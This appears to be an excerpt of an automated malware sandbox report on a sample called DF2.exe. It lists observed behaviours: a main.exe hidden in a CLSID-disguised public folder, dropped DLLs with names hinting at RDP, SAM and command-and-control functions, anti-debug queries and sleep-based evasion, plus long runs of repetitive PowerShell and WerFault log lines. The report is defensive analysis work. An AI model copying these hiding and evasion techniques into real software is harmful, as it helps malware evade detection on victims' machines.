Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,		21_2_00007FFE0EB434F4
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,		32_2_00007FFE11BD34F4

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	21_2_00007FFE0E162BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	21_2_00007FFE0EB45728
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	21_2_00007FFE11502BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	21_2_00007FFE11EC2CE8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	32_2_00007FFE11772BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	32_2_00007FFE11BD5728
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	32_2_00007FFE11EC2BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	32_2_00007FFE126D2CE8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	32_2_00007FFE13202278
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	32_2_00007FFE13301D98

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6231	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3507	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8187	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1433	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7756	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1656	Jump to behavior

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\DiEI7oU1	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\DkzUMxZ8	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\yGODxgsj	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\LcUJSdZq	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\YERHbDgw	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\5P46VR1V	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\2s3EMNnh	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\bT51Gn7Q	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\6KasAPG0	Jump to dropped file

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_21-44015

Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_5-9999

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	API coverage: 9.9 %
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	API coverage: 9.2 %

Source: C:\Users\user\Desktop\DF2.exe TID: 6724	Thread sleep time: -23760000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7124	Thread sleep count: 6231 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7120	Thread sleep count: 3507 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3940	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4960	Thread sleep count: 8187 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1136	Thread sleep count: 1433 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6476	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5480	Thread sleep count: 7756 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5480	Thread sleep count: 1656 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6892	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 6412	Thread sleep count: 79 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 6412	Thread sleep time: -39500s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1260	Thread sleep count: 79 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1260	Thread sleep time: -39500s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 7152	Thread sleep count: 51 > 30

Source: C:\Users\user\Desktop\DF2.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\Desktop\DF2.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior

Source: C:\Users\user\Desktop\DF2.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe	Code function: 5_2_00007FF764CC3DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	5_2_00007FF764CC3DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FF76A901CF3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	21_2_00007FF76A901CF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FFE0E166233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	21_2_00007FFE0E166233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FFE0EB4B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	21_2_00007FFE0EB4B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FFE11504013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	21_2_00007FFE11504013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FFE11EC5013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	21_2_00007FFE11EC5013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE11776233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	32_2_00007FFE11776233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE11BDB333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	32_2_00007FFE11BDB333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE11EC4013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	32_2_00007FFE11EC4013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE126D5013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	32_2_00007FFE126D5013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE132057B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	32_2_00007FFE132057B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE133031F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	32_2_00007FFE133031F3

Source: C:\Users\user\Desktop\DF2.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1922920739.0000023EDEF58000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000003.1866710630.000001DE38CBC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2911699496.000002009FE88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: DF2.exe, 00000001.00000002.2910782778.0000000000E01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllEE
Source: main.exe, 00000015.00000002.2481928274.000001DE38C9C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll33

Source: C:\Users\user\Desktop\DF2.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Process queried: DebugPort
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe

Code function: 5_2_00007FF764CCFF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

